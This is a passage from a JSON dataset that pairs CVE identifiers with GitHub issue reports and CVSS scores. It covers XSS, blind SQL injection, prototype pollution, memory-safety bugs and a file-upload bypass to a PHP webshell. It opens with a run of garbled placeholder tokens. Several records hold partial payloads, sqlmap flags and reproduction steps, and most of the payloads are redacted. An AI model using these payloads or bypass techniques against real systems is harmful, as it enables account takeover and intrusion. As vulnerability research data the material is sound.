APITAG NUMBERTAG pc NUMBERTAG d 
PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG",
  64814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64815. "severity": "HIGH",
  64816. "baseScore": 7.5,
  64817. "impactScore": 3.6,
  64818. "exploitabilityScore": 3.9
  64819. },
  64820. {
  64821. "CVE_ID": "CVE-2021-28417",
  64822. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/208",
  64823. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/208",
  64824. "Repo_new": "seopanel/seo-panel",
  64825. "Issue_Created_At": "2021-03-11T19:12:27Z",
  64826. "description": "XSS Vulnerability in \"search_name\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload: APITAG ___ Vulnerable parameter: search_name ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG APITAG search APITAG NUMBERTAG APITAG NUMBERTAG Hover your mouse near to \"CTR\" field As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  64827. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  64828. "severity": "MEDIUM",
  64829. "baseScore": 4.8,
  64830. "impactScore": 2.7,
  64831. "exploitabilityScore": 1.7
  64832. },
  64833. {
  64834. "CVE_ID": "CVE-2021-28418",
  64835. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/207",
  64836. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/207",
  64837. "Repo_new": "seopanel/seo-panel",
  64838. "Issue_Created_At": "2021-03-11T19:08:43Z",
  64839. "description": "XSS Vulnerability in \"category: parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload : APITAG ___ Vulnerable parameter : category ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG Hover your mouse to APITAG field As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC : URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  64840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  64841. "severity": "MEDIUM",
  64842. "baseScore": 4.8,
  64843. "impactScore": 2.7,
  64844. "exploitabilityScore": 1.7
  64845. },
  64846. {
  64847. "CVE_ID": "CVE-2021-28419",
  64848. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/209",
  64849. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/209",
  64850. "Repo_new": "seopanel/seo-panel",
  64851. "Issue_Created_At": "2021-03-13T12:05:18Z",
  64852. "description": "Time based blind SQLi Injection Vulnerability in \"order_col\" parameter. Hi Team I would like to report Time based blind SQLI. Description: SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. ___ Vulnerable parameter: order_col ___ Step to reproduce the issue NUMBERTAG Login to SEO admin Panel NUMBERTAG Copy paste below link: APITAG NUMBERTAG APITAG search APITAG NUMBERTAG website_id NUMBERTAG Replace value of \"order_col\" parameter with below payloads: Payload: (SELECT NUMBERTAG FROM APITAG NUMBERTAG You can see the page sleeps for NUMBERTAG seconds and maybe some seconds more. ___ Video POC : URLTAG ___ Automated way: sqlmap r FILETAG batch level NUMBERTAG risk NUMBERTAG dbms MYSQL dbs technique=T flush session ___ Impact Attacker can mount one or more of the following type of attacks successfully: \u2022 Reading, updating and deleting arbitrary data/tables from the database \u2022 Executing commands on the underlying operating system",
  64853. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  64854. "severity": "HIGH",
  64855. "baseScore": 7.2,
  64856. "impactScore": 5.9,
  64857. "exploitabilityScore": 1.2
  64858. },
  64859. {
  64860. "CVE_ID": "CVE-2021-28420",
  64861. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/206",
  64862. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/206",
  64863. "Repo_new": "seopanel/seo-panel",
  64864. "Issue_Created_At": "2021-03-11T19:06:01Z",
  64865. "description": "XSS Vulnerability in \"from_time\" parameter. Hi team, I would like to report an XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"from_time\" parameter. ___ XSS Payload: APITAG ___ Vulnerable parameter: from_time ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG Hover your mouse over the APITAG field As you can see, XSS is triggered and can send cookies to the attacker. ___ Video POC: URLTAG ___ Impact With the help of XSS an attacker can perform social engineering on users by redirecting them from the real website to a fake one. An attacker can steal their cookies leading to account takeover and download malware on their system, and there are many more attack scenarios a skilled attacker can perform with XSS.",
  64866. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  64867. "severity": "MEDIUM",
  64868. "baseScore": 4.8,
  64869. "impactScore": 2.7,
  64870. "exploitabilityScore": 1.7
  64871. },
  64872. {
  64873. "CVE_ID": "CVE-2021-28680",
  64874. "Issue_Url_old": "https://github.com/oivoodoo/devise_masquerade/issues/83",
  64875. "Issue_Url_new": "https://github.com/oivoodoo/devise_masquerade/issues/83",
  64876. "Repo_new": "oivoodoo/devise_masquerade",
  64877. "Issue_Created_At": "2021-03-23T20:08:25Z",
  64878. "description": "CVETAG : One layer of security is lost when using devise_masquerade under certain circumstances in versions before NUMBERTAG This is a security vulnerability that has been subject to a NUMBERTAG day disclosure deadline and has been fixed in the NUMBERTAG release of APITAG . I'm creating this issue for traceability inside the APITAG project and to be able to refer to it from the CVE. Ideally a security advisory should be created. If the APITAG variable is somehow leaked, an attacker can become any user by misusing the \"masquerade back\" functionality of this Devise extension, something that is not possible in plain Devise since the attacker must know the victim's password salt to form a valid session cookie to encrypt and sign using APITAG . From the description of CVETAG CVETAG : > The devise_masquerade gem before NUMBERTAG allows certain attacks when a password's salt is unknown. > An application that uses this gem > to let administrators masquerade/impersonate users loses > one layer of security protection compared to a situation where Devise (without this > extension) is used. If the server side secret_key_base value > became publicly known (for instance if it is committed to a public > repository by mistake), there are still other protections in > place that prevent an attacker from impersonating any user on the > site. When masquerading is not used in a plain Devise application, one > must know the password salt of the target user if one wants to encrypt > and sign a valid session cookie. When devise_masquerade is used, > however, an attacker can decide which user the \"back\" action will go > back to without knowing that user's password salt and simply knowing > the user ID, by manipulating the session cookie and pretending that a > user is already masqueraded by an administrator. By adding and setting the dictionary key APITAG to the user ID of the admin victim in the session cookie APITAG object, an attacker can fake that an impersonation has occurred and then use the \"masquerade back\" functionality to become the victim.",
  64879. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64880. "severity": "HIGH",
  64881. "baseScore": 8.1,
  64882. "impactScore": 5.9,
  64883. "exploitabilityScore": 2.2
  64884. },
  64885. {
  64886. "CVE_ID": "CVE-2021-28681",
  64887. "Issue_Url_old": "https://github.com/pion/webrtc/issues/1708",
  64888. "Issue_Url_new": "https://github.com/pion/webrtc/issues/1708",
  64889. "Repo_new": "pion/webrtc",
  64890. "Issue_Created_At": "2021-03-17T22:26:36Z",
  64891. "description": "DTLS Fingerprints in SDP APITAG are not verified. APITAG Your environment. Version: pion/webrtc NUMBERTAG Browser: N/A Other Information reproducible with example/data channels create & example/data channels What did you do? APITAG Run both APITAG and APITAG from example. Once the SDP offer has been generated, decode it with base NUMBERTAG Randomly edit the DTLS fingerprint value in the SDP offer Copy & paste the base NUMBERTAG encoded SDP offer into the waiting APITAG Copy & paste the SDP answer generated by APITAG into APITAG What did you expect? The built in APITAG should throw an error and therefore prevent the data channel from being established. What happened? The data channel was created as usual. CODETAG",
  64892. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  64893. "severity": "MEDIUM",
  64894. "baseScore": 5.3,
  64895. "impactScore": 1.4,
  64896. "exploitabilityScore": 3.9
  64897. },
  64898. {
  64899. "CVE_ID": "CVE-2021-28860",
  64900. "Issue_Url_old": "https://github.com/adaltas/node-mixme/issues/1",
  64901. "Issue_Url_new": "https://github.com/adaltas/node-mixme/issues/1",
  64902. "Repo_new": "adaltas/node-mixme",
  64903. "Issue_Created_At": "2021-04-22T09:23:50Z",
  64904. "description": "Prototype Pollution in Mixme. Hi there, In FILETAG mixme NUMBERTAG an attacker can add or alter properties of an object via '__proto__' through the APITAG and APITAG functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service APITAG POC code: merge({}, APITAG {\"polluted\": APITAG polluted!!!\"}}')) NPM should be notified accordingly. You can contact me regarding the mitigation. Have a great weekend.",
  64905. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  64906. "severity": "CRITICAL",
  64907. "baseScore": 9.1,
  64908. "impactScore": 5.2,
  64909. "exploitabilityScore": 3.9
  64910. },
  64911. {
  64912. "CVE_ID": "CVE-2021-28874",
  64913. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5769",
  64914. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5769",
  64915. "Repo_new": "serenityos/serenity",
  64916. "Issue_Created_At": "2021-03-13T22:58:23Z",
  64917. "description": "APITAG Heap buffer overflow in UTF NUMBERTAG BE decoder. Trace: ERRORTAG",
  64918. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64919. "severity": "HIGH",
  64920. "baseScore": 7.8,
  64921. "impactScore": 5.9,
  64922. "exploitabilityScore": 1.8
  64923. },
  64924. {
  64925. "CVE_ID": "CVE-2021-28875",
  64926. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/80894",
  64927. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/80894",
  64928. "Repo_new": "rust-lang/rust",
  64929. "Issue_Created_At": "2021-01-11T01:16:29Z",
  64930. "description": "Heap buffer overflow in APITAG . URLTAG At line NUMBERTAG the guard object's APITAG field is incremented by the value returned from a read implementation. If a questionable Read returns a value larger than the buffer size, it will take that value and set the length of the vector over the boundary. This bug is reachable from APITAG and APITAG . Here is a playground link URLTAG that demonstrates the bug. It segfaults with APITAG .",
  64931. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64932. "severity": "HIGH",
  64933. "baseScore": 7.5,
  64934. "impactScore": 3.6,
  64935. "exploitabilityScore": 3.9
  64936. },
  64937. {
  64938. "CVE_ID": "CVE-2021-28876",
  64939. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/81740",
  64940. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/81740",
  64941. "Repo_new": "rust-lang/rust",
  64942. "Issue_Created_At": "2021-02-04T06:49:38Z",
  64943. "description": "Soundness issue in APITAG specialization. URLTAG URLTAG There is a panic safety issue in APITAG that allows to call ERRORTAG to the same index twice. ERRORTAG is called at line NUMBERTAG and the index is updated at line NUMBERTAG If line NUMBERTAG panics, the index is not updated and the subsequent APITAG call will use the same index for ERRORTAG . This violates the second safety requirement of APITAG . Here is a playground link URLTAG that demonstrates creating two mutable references to the same memory location without using unsafe Rust.",
  64944. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  64945. "severity": "MEDIUM",
  64946. "baseScore": 5.3,
  64947. "impactScore": 1.4,
  64948. "exploitabilityScore": 3.9
  64949. },
  64950. {
  64951. "CVE_ID": "CVE-2021-28878",
  64952. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/82291",
  64953. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/82291",
  64954. "Repo_new": "rust-lang/rust",
  64955. "Issue_Created_At": "2021-02-19T14:23:14Z",
  64956. "description": "Zip may call __iterator_get_unchecked twice with the same index. Here ERRORTAG is called for potential side effects until APITAG , ignoring however that it could have already been called in APITAG with those indexes. URLTAG Playground link URLTAG that demonstrates how this can be exploited to get two mutable references to the same data and cause a use-after-free bug.",
  64957. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64958. "severity": "HIGH",
  64959. "baseScore": 7.5,
  64960. "impactScore": 3.6,
  64961. "exploitabilityScore": 3.9
  64962. },
  64963. {
  64964. "CVE_ID": "CVE-2021-28879",
  64965. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/82282",
  64966. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/82282",
  64967. "Repo_new": "rust-lang/rust",
  64968. "Issue_Created_At": "2021-02-19T03:43:41Z",
  64969. "description": "Side effect handling in specialized zip implementation causes buffer overflow. URLTAG URLTAG APITAG can be set to a value greater than APITAG in this branch. This causes an integer overflow in APITAG and leads to a buffer overflow. Playground Link URLTAG that demonstrates a segfault with safe Rust code.",
  64970. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64971. "severity": "CRITICAL",
  64972. "baseScore": 9.8,
  64973. "impactScore": 5.9,
  64974. "exploitabilityScore": 3.9
  64975. },
  64976. {
  64977. "CVE_ID": "CVE-2021-28902",
  64978. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1454",
  64979. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1454",
  64980. "Repo_new": "cesnet/libyang",
  64981. "Issue_Created_At": "2021-03-08T11:34:27Z",
  64982. "description": "In function \"read_yin_container\", the value \"retval >ext[r]\" can be NULL. The operation \"retval >ext[r] >flags\" result in a crash. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Krejesne APITAG APITAG APITAG tion> APITAG APITAG APITAG APITAG :rre instance value=\"false\"/> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  64983. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64984. "severity": "HIGH",
  64985. "baseScore": 7.5,
  64986. "impactScore": 3.6,
  64987. "exploitabilityScore": 3.9
  64988. },
  64989. {
  64990. "CVE_ID": "CVE-2021-28903",
  64991. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1453",
  64992. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1453",
  64993. "Repo_new": "cesnet/libyang",
  64994. "Issue_Created_At": "2021-03-08T07:25:01Z",
  64995. "description": "The recursive call of \"lyxml_parse_elem\" leads to a crash.",
  64996. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64997. "severity": "HIGH",
  64998. "baseScore": 7.5,
  64999. "impactScore": 3.6,
  65000. "exploitabilityScore": 3.9
  65001. },
  65002. {
  65003. "CVE_ID": "CVE-2021-28904",
  65004. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1451",
  65005. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1451",
  65006. "Repo_new": "cesnet/libyang",
  65007. "Issue_Created_At": "2021-03-08T02:03:57Z",
  65008. "description": "\u201cext_get_plugin\u201d function causes a crash. The argument \"revision\" of function ext_get_plugin can be NULL, which can cause a crash in strcmp.",
  65009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65010. "severity": "HIGH",
  65011. "baseScore": 7.5,
  65012. "impactScore": 3.6,
  65013. "exploitabilityScore": 3.9
  65014. },
  65015. {
  65016. "CVE_ID": "CVE-2021-28905",
  65017. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1452",
  65018. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1452",
  65019. "Repo_new": "cesnet/libyang",
  65020. "Issue_Created_At": "2021-03-08T03:16:06Z",
  65021. "description": "\u201clys_node_free\u201d function's arg node >module can be NULL, which lead to assert.. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG revision. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  65022. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65023. "severity": "HIGH",
  65024. "baseScore": 7.5,
  65025. "impactScore": 3.6,
  65026. "exploitabilityScore": 3.9
  65027. },
  65028. {
  65029. "CVE_ID": "CVE-2021-28906",
  65030. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1455",
  65031. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1455",
  65032. "Repo_new": "cesnet/libyang",
  65033. "Issue_Created_At": "2021-03-08T11:35:21Z",
  65034. "description": "In function \"read_yin_leaf\", the value \"retval->ext[r]\" can be NULL. The operation \"retval->ext[r]->flags\" results in a crash. CODETAG",
  65035. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65036. "severity": "HIGH",
  65037. "baseScore": 7.5,
  65038. "impactScore": 3.6,
  65039. "exploitabilityScore": 3.9
  65040. },
  65041. {
  65042. "CVE_ID": "CVE-2021-28976",
  65043. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1335",
  65044. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1335",
  65045. "Repo_new": "getsimplecms/getsimplecms",
  65046. "Issue_Created_At": "2021-03-19T12:47:58Z",
  65047. "description": "Before APITAG NUMBERTAG ersion FILETAG allowed to upload executable files lead to RCE. Affected version: APITAG before NUMBERTAG ulnerable file: FILETAG . Causes of vulnerability : FILETAG does not allow direct uploading of ph type files, and it fails when directly uploading ph files. FILETAG However, you can bypass the detection by uploading a phar file and adding picture file header information such as jpg to the file to successfully upload the phar file. FILETAG Because the phar file can be parsed normally after php NUMBERTAG you can directly upload the php webshell with the phar suffix. FILETAG Repair suggestion: add the ph file to the upload blacklist",
  65048. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  65049. "severity": "HIGH",
  65050. "baseScore": 7.2,
  65051. "impactScore": 5.9,
  65052. "exploitabilityScore": 1.2
  65053. },
  65054. {
  65055. "CVE_ID": "CVE-2021-28977",
  65056. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1336",
  65057. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1336",
  65058. "Repo_new": "getsimplecms/getsimplecms",
  65059. "Issue_Created_At": "2021-03-19T13:39:08Z",
  65060. "description": "Cross Site Scripting(XSS) Vulnerability via upload in Latest Release NUMBERTAG FILETAG . Affected version : APITAG before NUMBERTAG ulnerable file : FILETAG . Vulnerability type : Cross Site Scripting(XSS) The file content filtering in FILETAG is not comprehensive. Adding comments or jpg and other file header information in the file content can lead to the successful upload of files such as xla, pages, gzip, etc. that contain HTML code. If an attacker adds malicious js scripts to the HTML code, it may trigger cross site scripting (XSS) vulnerabilities and threaten user information. FILETAG FILETAG FILETAG FILETAG Repair suggestion: Filter sensitive characters in uploaded files, such as APITAG , etc.",
  65061. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65062. "severity": "MEDIUM",
  65063. "baseScore": 4.8,
  65064. "impactScore": 2.7,
  65065. "exploitabilityScore": 1.7
  65066. },
  65067. {
  65068. "CVE_ID": "CVE-2021-29002",
  65069. "Issue_Url_old": "https://github.com/plone/Products.CMFPlone/issues/3255",
  65070. "Issue_Url_new": "https://github.com/plone/products.cmfplone/issues/3255",
  65071. "Repo_new": "plone/products.cmfplone",
  65072. "Issue_Created_At": "2021-03-03T07:13:08Z",
  65073. "description": "Stored XSS in APITAG field. Hi Team, Description: Stored XSS, also known as persistent XSS, is more damaging than non persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application. Vulnerable Parameter: APITAG Affected version NUMBERTAG SS payload: APITAG APITAG Steps to reproduce the issue NUMBERTAG Goto FILETAG where Plone NUMBERTAG ersion is installed NUMBERTAG Click on APITAG in now\" and Login as APITAG NUMBERTAG Navigate to APITAG APITAG NUMBERTAG Edit APITAG title\" field to APITAG APITAG \" Video POC: URLTAG Impact: XSS can use to steal cookies, password or to run arbitrary code on a victim's browser Reference: URLTAG URLTAG URLTAG Regards, Piyush Patil",
  65074. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65075. "severity": "MEDIUM",
  65076. "baseScore": 5.4,
  65077. "impactScore": 2.7,
  65078. "exploitabilityScore": 2.3
  65079. },
  65080. {
  65081. "CVE_ID": "CVE-2021-29008",
  65082. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/211",
  65083. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/211",
  65084. "Repo_new": "seopanel/seo-panel",
  65085. "Issue_Created_At": "2021-03-19T12:46:12Z",
  65086. "description": "XSS Vulnerability in \"to_time\" parameter. Hi team, I would like to report an XSS vulnerability. Description A cross site scripting (XSS) issue in the SEO admin login panel version NUMBERTAG allows remote attackers to inject APITAG via the \"to_time\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: to_time ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to the attacker. ___ Video POC: URLTAG ___ Impact With the help of XSS an attacker can perform social engineering on users by redirecting them from the real website to a fake one. An attacker can steal their cookies leading to account takeover and download malware on their system, and there are many more attack scenarios a skilled attacker can perform with XSS.",
  65087. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65088. "severity": "MEDIUM",
  65089. "baseScore": 4.8,
  65090. "impactScore": 2.7,
  65091. "exploitabilityScore": 1.7
  65092. },
  65093. {
  65094. "CVE_ID": "CVE-2021-29009",
  65095. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/210",
  65096. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/210",
  65097. "Repo_new": "seopanel/seo-panel",
  65098. "Issue_Created_At": "2021-03-19T12:43:40Z",
  65099. "description": "XSS Vulnerability in \"type\" parameter. Hi team, I would like to report an XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"type\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: type ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to the attacker. ___ Video POC: URLTAG ___ Impact With the help of XSS an attacker can perform social engineering on users by redirecting them from the real website to a fake one. An attacker can steal their cookies leading to account takeover and download malware on their system, and there are many more attack scenarios a skilled attacker can perform with XSS.",
  65100. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65101. "severity": "MEDIUM",
  65102. "baseScore": 4.8,
  65103. "impactScore": 2.7,
  65104. "exploitabilityScore": 1.7
  65105. },
  65106. {
  65107. "CVE_ID": "CVE-2021-29010",
  65108. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/212",
  65109. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/212",
  65110. "Repo_new": "seopanel/seo-panel",
  65111. "Issue_Created_At": "2021-03-19T12:50:19Z",
  65112. "description": "XSS Vulnerability in \"report_type\" parameter. Hi team, I would like to report an XSS vulnerability. Description A cross site scripting (XSS) issue in the SEO admin login panel version NUMBERTAG allows remote attackers to inject APITAG via the \"report_type\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: report_type ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to the attacker. ___ Video POC: URLTAG ___ Impact With the help of XSS an attacker can perform social engineering on users by redirecting them from the real website to a fake one. An attacker can steal their cookies leading to account takeover and download malware on their system, and there are many more attack scenarios a skilled attacker can perform with XSS.",
  65113. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65114. "severity": "MEDIUM",
  65115. "baseScore": 4.8,
  65116. "impactScore": 2.7,
  65117. "exploitabilityScore": 1.7
  65118. },
  65119. {
  65120. "CVE_ID": "CVE-2021-29056",
  65121. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/21",
  65122. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/21",
  65123. "Repo_new": "pixelimity/pixelimity",
  65124. "Issue_Created_At": "2021-03-22T08:44:13Z",
  65125. "description": "pixelimity \u2013 Cross Site Scripting (XSS) in APITAG Product: pixelimity Download: URLTAG Vulnerable Version: latest version Tested Version: latest version Author:qianxiao NUMBERTAG Description: Pixelimity CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cportfolio latest version\u201d, which can be exploited to execute arbitrary script code in a victim's browser. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Proof of concept: APITAG as admin. APITAG URL FILETAG and click on APITAG APITAG XSS payload in the APITAG parameter Pixelimity\"> APITAG alert NUMBERTAG APITAG and click on APITAG Setting\" FILETAG FILETAG FILETAG",
  65126. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65127. "severity": "MEDIUM",
  65128. "baseScore": 4.8,
  65129. "impactScore": 2.7,
  65130. "exploitabilityScore": 1.7
  65131. },
  65132. {
  65133. "CVE_ID": "CVE-2021-29061",
  65134. "Issue_Url_old": "https://github.com/fracpete/vfsjfilechooser2/issues/7",
  65135. "Issue_Url_new": "https://github.com/fracpete/vfsjfilechooser2/issues/7",
  65136. "Repo_new": "fracpete/vfsjfilechooser2",
  65137. "Issue_Created_At": "2020-09-30T14:56:00Z",
  65138. "description": "Vulnerable Regular Expression in vfsjfilechooser2. Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG The APITAG vulnerability can be exploited with the following string APITAG You can execute the following code to reproduce APITAG CODETAG I think you can limit the input length or modify this regex.",
  65139. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65140. "severity": "HIGH",
  65141. "baseScore": 7.5,
  65142. "impactScore": 3.6,
  65143. "exploitabilityScore": 3.9
  65144. },
  65145. {
  65146. "CVE_ID": "CVE-2021-29272",
  65147. "Issue_Url_old": "https://github.com/microcosm-cc/bluemonday/issues/111",
  65148. "Issue_Url_new": "https://github.com/microcosm-cc/bluemonday/issues/111",
  65149. "Repo_new": "microcosm-cc/bluemonday",
  65150. "Issue_Created_At": "2021-03-27T10:30:00Z",
